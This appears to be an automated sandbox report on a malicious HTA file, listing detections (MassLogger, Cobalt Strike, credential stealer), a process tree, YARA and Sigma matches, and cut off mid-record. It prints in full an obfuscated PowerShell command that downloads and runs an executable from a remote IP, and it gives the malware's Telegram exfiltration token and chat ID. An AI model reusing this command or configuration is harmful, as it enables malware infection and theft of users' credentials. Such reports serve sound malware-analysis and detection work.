Edit tour

Windows Analysis Report
niceworkingskillgivenmebest.hta

Overview

General Information

Sample name:	niceworkingskillgivenmebest.hta
Analysis ID:	1640152
MD5:	b373d0e25e733942a4f8e7b60d2e1efb
SHA1:	48461b4400a6fbe3956062479f566a09e3fb81c2
SHA256:	526e8c3e5935b935765705b0722305c780ced034b6760b997b87cad4bb4b665a
Tags:	htauser-abuse_ch
Infos:

Detection

Cobalt Strike, MSIL Logger, MassLogger RAT

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected Cobalt Strike Beacon

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected MSIL Logger

Yara detected MassLogger RAT

Yara detected Powershell decode and execute

Yara detected Telegram RAT

.NET source code references suspicious native API functions

Binary is likely a compiled AutoIt script file

Contains functionality to log keystrokes (.Net Source)

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

PowerShell case anomaly found

Powershell drops PE file

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Suspicious MSHTA Child Process

Suspicious command line found

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Use Short Name Path in Command Line

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 6748 cmdline: mshta.exe "C:\Users\user\Desktop\niceworkingskillgivenmebest.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

cmd.exe (PID: 6916 cmdline: "C:\Windows\system32\cmd.exe" "/C POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7092 cmdline: POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 1432 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 5876 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES99C2.tmp" "c:\Users\user\AppData\Local\Temp\dkem0svg\CSCF28CCA96CDC44F1E801052D43790FDA5.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

cossess.exe (PID: 5720 cmdline: "C:\Users\user\AppData\Roaming\cossess.exe" MD5: 9A772B3531C6426C3DB9CD09AE1B8576)

RegSvcs.exe (PID: 416 cmdline: "C:\Users\user\AppData\Roaming\cossess.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

svchost.exe (PID: 6652 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7996508565:AAHHBM6wSJS6GosO-ff2t38cxPw1t-vbBj8", "Telegram Chatid": "5758197122"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xefdf:$a1: get_encryptedPassword 0xf307:$a2: get_encryptedUsername 0xed7a:$a3: get_timePasswordChanged 0xee9b:$a4: get_passwordField 0xeff5:$a5: set_encryptedPassword 0x10951:$a7: get_logins 0x10602:$a8: GetOutlookPasswords 0x103f4:$a9: StartKeylogger 0x108a1:$a10: KeyLoggerEventArgs 0x10451:$a11: KeyLoggerEventArgsEventHandler
00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1df:$a1: get_encryptedPassword 0xf507:$a2: get_encryptedUsername 0xef7a:$a3: get_timePasswordChanged 0xf09b:$a4: get_passwordField 0xf1f5:$a5: set_encryptedPassword 0x10b51:$a7: get_logins 0x10802:$a8: GetOutlookPasswords 0x105f4:$a9: StartKeylogger 0x10aa1:$a10: KeyLoggerEventArgs 0x10651:$a11: KeyLoggerEventArgsEventHandler
00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1418b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13689:$a3: \Google\Chrome\User Data\Default\Login Data 0x13997:$a4: \Orbitum\User Data\Default\Login Data 0x1478f:$a5: \Kometa\User Data\Default\Login Data
00000007.00000002.2104403601.0000000002656000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cossess.exe PID: 5720	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: cossess.exe PID: 5720	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: cossess.exe PID: 5720	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: cossess.exe PID: 5720	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: cossess.exe PID: 5720	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf7526:$a1: get_encryptedPassword 0xf783f:$a2: get_encryptedUsername 0xf72d5:$a3: get_timePasswordChanged 0xf73f6:$a4: get_passwordField 0xf753c:$a5: set_encryptedPassword 0xf8e3f:$a7: get_logins 0xf8af0:$a8: GetOutlookPasswords 0xf88e2:$a9: StartKeylogger 0xf8d8f:$a10: KeyLoggerEventArgs 0xf893f:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 416	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 416	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 416	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: RegSvcs.exe PID: 416	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 416	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x21c1f:$a1: get_encryptedPassword 0x21f38:$a2: get_encryptedUsername 0x219ce:$a3: get_timePasswordChanged 0x21aef:$a4: get_passwordField 0x21c35:$a5: set_encryptedPassword 0x23538:$a7: get_logins 0x231e9:$a8: GetOutlookPasswords 0x22fdb:$a9: StartKeylogger 0x23488:$a10: KeyLoggerEventArgs 0x23038:$a11: KeyLoggerEventArgsEventHandler
Click to see the 17 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.cossess.exe.1540000.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
6.2.cossess.exe.1540000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.cossess.exe.1540000.1.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
6.2.cossess.exe.1540000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.cossess.exe.1540000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3df:$a1: get_encryptedPassword 0xd707:$a2: get_encryptedUsername 0xd17a:$a3: get_timePasswordChanged 0xd29b:$a4: get_passwordField 0xd3f5:$a5: set_encryptedPassword 0xed51:$a7: get_logins 0xea02:$a8: GetOutlookPasswords 0xe7f4:$a9: StartKeylogger 0xeca1:$a10: KeyLoggerEventArgs 0xe851:$a11: KeyLoggerEventArgsEventHandler
6.2.cossess.exe.1540000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1238b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11889:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b97:$a4: \Orbitum\User Data\Default\Login Data 0x1298f:$a5: \Kometa\User Data\Default\Login Data
7.2.RegSvcs.exe.5b0000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
7.2.RegSvcs.exe.5b0000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.RegSvcs.exe.5b0000.0.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
7.2.RegSvcs.exe.5b0000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.RegSvcs.exe.5b0000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1df:$a1: get_encryptedPassword 0xf507:$a2: get_encryptedUsername 0xef7a:$a3: get_timePasswordChanged 0xf09b:$a4: get_passwordField 0xf1f5:$a5: set_encryptedPassword 0x10b51:$a7: get_logins 0x10802:$a8: GetOutlookPasswords 0x105f4:$a9: StartKeylogger 0x10aa1:$a10: KeyLoggerEventArgs 0x10651:$a11: KeyLoggerEventArgsEventHandler
7.2.RegSvcs.exe.5b0000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1418b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13689:$a3: \Google\Chrome\User Data\Default\Login Data 0x13997:$a4: \Orbitum\User Data\Default\Login Data 0x1478f:$a5: \Kometa\User Data\Default\Login Data
6.2.cossess.exe.1540000.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
6.2.cossess.exe.1540000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.cossess.exe.1540000.1.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
6.2.cossess.exe.1540000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.cossess.exe.1540000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1df:$a1: get_encryptedPassword 0xf507:$a2: get_encryptedUsername 0xef7a:$a3: get_timePasswordChanged 0xf09b:$a4: get_passwordField 0xf1f5:$a5: set_encryptedPassword 0x10b51:$a7: get_logins 0x10802:$a8: GetOutlookPasswords 0x105f4:$a9: StartKeylogger 0x10aa1:$a10: KeyLoggerEventArgs 0x10651:$a11: KeyLoggerEventArgsEventHandler
6.2.cossess.exe.1540000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1418b:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13689:$a3: \Google\Chrome\User Data\Default\Login Data 0x13997:$a4: \Orbitum\User Data\Default\Login Data 0x1478f:$a5: \Kometa\User Data\Default\Login Data
Click to see the 13 entries

Other

Source	Rule	Description	Author	Strings
amsi32_7092.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICA

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7092, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.cmdline", ProcessId: 1432, ProcessName: csc.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7092, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\cosses[1].exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES99C2.tmp" "c:\Users\user\AppData\Local\Temp\dkem0svg\CSCF28CCA96CDC44F1E801052D43790FDA5.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES99C2.tmp" "c:\Users\user\AppData\Local\Temp\dkem0svg\CSCF28CCA96CDC44F1E801052D43790FDA5.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentProcessId: 1432, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES99C2.tmp" 